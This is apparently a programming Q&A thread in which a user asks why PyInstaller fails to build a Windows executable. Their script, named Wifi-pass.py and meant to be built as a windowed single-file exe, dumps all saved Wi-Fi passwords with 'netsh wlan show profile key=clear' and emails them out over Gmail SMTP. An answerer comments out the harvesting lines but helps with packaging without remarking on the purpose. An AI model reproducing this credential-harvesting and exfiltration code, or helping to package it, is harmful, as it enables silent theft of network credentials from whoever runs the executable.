# How to make a python script executable

Tags: python, exe, pyinstaller

I'm trying to make a simple python executable.
 
I tried it on python 3 and python 2.7, downloaded winpy32, tried it on Linux and windows, tried py-to-exe and pyinstaller. and I am still getting this  error:

```
raise error(exception.winerror, exception.function, exception.strerror)
win32ctypes.pywin32.pywintypes.error:
```

here's my code:

```
import subprocess
import smtplib
from smtplib import *
import re

command1 = "netsh wlan show profile"
networks = subprocess.check_output(command1, shell=True)
network_list = re.findall('(?:Profile\s*:\s)(.*)', networks.decode())

final_output = ""
for network in network_list:
    command2 = "netsh wlan show profile " + network + " key=clear"
    a_network_result = subprocess.check_output(command2, shell=True)
    final_output += a_network_result.decode()

final_output = str(final_output)


fromMy = 'myemail'
to = 'myEmail'
subj = 'TheSubject'
date = '23/5/2020'
message_text = final_output

msg = r"From: %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s" % ( fromMy, to, subj, date, message_text )

username = str('MyEmail')
password = str('MyPasswd')

#try:
server = smtplib.SMTP("smtp.gmail.com", 587)
server.starttls()
server.login(username, password)
server.sendmail(fromMy, to, msg)
server.quit()
```

here is the full trace =

```
79702 DEBUG: Analyzing .git\objects\78\e83411cea88cd038acb12c005a984fc0d6d423
Traceback (most recent call last):
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\win32ctypes\pywin32\pywintypes.py", line 35, in pywin32error
    yield
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\win32ctypes\pywin32\win32api.py", line 43, in LoadLibraryEx
    return _dll._LoadLibraryEx(fileName, 0, flags)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\win32ctypes\core\ctypes\_util.py", line 42, in check_null
    raise make_error(function, function_name)
OSError: [WinError 2] The system cannot find the file specified.

During handling of the above exception, another exception occurred:

Traceback (most recent call last):
  File "C:/Users/User1/Dropbox/GitHub_Repos/DiabetesReportGenerator_v2/pyinstaller_freeze.py", line 37, in <module>
    'MainWindow.py'
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\__main__.py", line 112, in run
    run_build(pyi_config, spec_file, **vars(args))
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\__main__.py", line 63, in run_build
    PyInstaller.building.build_main.main(pyi_config, spec_file, **kwargs)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\building\build_main.py", line 732, in main
    build(specfile, kw.get('distpath'), kw.get('workpath'), kw.get('clean_build'))
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\building\build_main.py", line 679, in build
    exec(code, spec_namespace)
  File "C:\Users\User1\Dropbox\GitHub_Repos\DiabetesReportGenerator_v2\Risk Calculator.spec", line 17, in <module>
    noarchive=False)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\building\build_main.py", line 242, in __init__
    self.__postinit__()
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\building\datastruct.py", line 158, in __postinit__
    self.assemble()
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\building\build_main.py", line 468, in assemble
    redirects=self.binding_redirects))
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\depend\bindepend.py", line 226, in Dependencies
    for ftocnm, fn in getAssemblyFiles(pth, manifest, redirects):
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\depend\bindepend.py", line 402, in getAssemblyFiles
    for assembly in getAssemblies(pth):
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\depend\bindepend.py", line 353, in getAssemblies
    res = GetManifestResources(pth)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\utils\win32\winmanifest.py", line 1005, in GetManifestResources
    return winresource.GetResources(filename, [RT_MANIFEST], names, languages)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\PyInstaller\utils\win32\winresource.py", line 168, in GetResources
    hsrc = win32api.LoadLibraryEx(filename, 0, LOAD_LIBRARY_AS_DATAFILE)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\win32ctypes\pywin32\win32api.py", line 43, in LoadLibraryEx
    return _dll._LoadLibraryEx(fileName, 0, flags)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\contextlib.py", line 130, in __exit__
    self.gen.throw(type, value, traceback)
  File "C:\Users\User1\Anaconda3\envs\ids_gui\lib\site-packages\win32ctypes\pywin32\pywintypes.py", line 37, in pywin32error
    raise error(exception.winerror, exception.function, exception.strerror)
win32ctypes.pywin32.pywintypes.error: (2, 'LoadLibraryExW', 'The system cannot find the file specified.')
```

is there maybe anything wrong with my os?
any help is welcome :)

Comment: I cannot really see anything in that block of code that should raise the error you've provided. However, you have not given us any information _at_ _all_ of how the error was raised on your side. Was it during the compilation of the script into an executable? Was it after? You tell us in the beginning of the question "i tried everything" and provide no actual evidence of what you've tried and what went wrong. Please show us the steps you've taken for the raised error to occur.

Comment: everytime i try to convert my python code with pyinstaller into an exe file i get an error. so  when an error appears i try to understand what the error is so i can fix it, if i dont understand it, i use google. everytime i fix an error i get another one which i also try to fix (thats what i mean with 'i tried everything'. after a lot of issues, i am still stuck with this one error 'raise error(exception.winerror, exception.function, exception.strerror) win32ctypes.pywin32.pywintypes.error:'

Comment: Please add the full trace back of the error

Comment: Can you show your pyinstaller command?

Comment: my pyinstaller command = python pyinstaller -F -w Wifi-pass.py

Comment: @medic17 i added it to the question

Comment: Try regular python not anaconda. Try the command like this in windows `pyinstaller Wifi-pass.py` without any arguments

Comment: i already tried it, when the process is finished i dont even get an exe file and when i click on the file i get an error saying 'the system couldn't find the specifies file'.

Answer (score 0):

Your code has some unrelated problems. I changed it a little and `pyinstaller` works as expected

```py
import subprocess
import smtplib
#from smtplib import *  Here you try to import smtplib again
#import re

# Not needed for this example
    # command1 = "netsh wlan show profile"
    # networks = subprocess.check_output(command1, shell=True)
    # network_list = re.findall('(?:Profile\s*:\s)(.*)', networks.decode())
    #
    # final_output = ""
    # for network in network_list:
    #     command2 = "netsh wlan show profile " + network + " key=clear"
    #     a_network_result = subprocess.check_output(command2, shell=True)
    #     final_output += a_network_result.decode()
#
final_output = 'cmd output' # Simulate the cmd output you want emailed


fromMy = 'myemail'
to = 'myEmail'
subj = 'TheSubject'
date = '23/5/2020'
message_text = final_output

msg = r"From: %s\nTo: %s\nSubject: %s\nDate: %s\n\n%s" % ( fromMy, to, subj, date, message_text )

# Use regular strings in the variables python implicitly types them
username = 'MyEmail'
password = 'MyPasswd'

try: # Will always fail without real credentials   
    server = smtplib.SMTP("smtp.gmail.com", 587)
    server.starttls()
    server.login(username, password)
    server.sendmail(fromMy, to, msg)
    server.quit()

except smtplib.SMTPAuthenticationError:
    print("The username or password were incorrect")
```

Worked for me under windows both python 3.7 and 3.8

Copy my code then run `pyinstaller <script name>.py` and see if the same error is raised again.

**note**: You need to run `<script name>.exe` from the terminal in the `dist\<script name>` path not `build\<script name>`

**edit**

Additional troubleshooting steps:

- Try python from [the python site](https://python.org) not Microsoft store
- Try a different environment (if you used venv or virtualenv try the system interpreter)
- Debug your script and make sure it can be run by python before you try to package it with `pyinstaller`

Comment: thanks for the reply! I tried this code, but i still get this error = 'raise error(exception.winerror, exception.function, exception.strerror :  'The system cannot access the file ' '  :(

Comment: @saïdalhazina what minor version (e.g. 3.7) of python did you try? Did you run my code from the `dist\main` directory? what is the output if you run it as a regular python script? sometimes this is caused by virtual environments try running it outside of a virtual environment and see what happens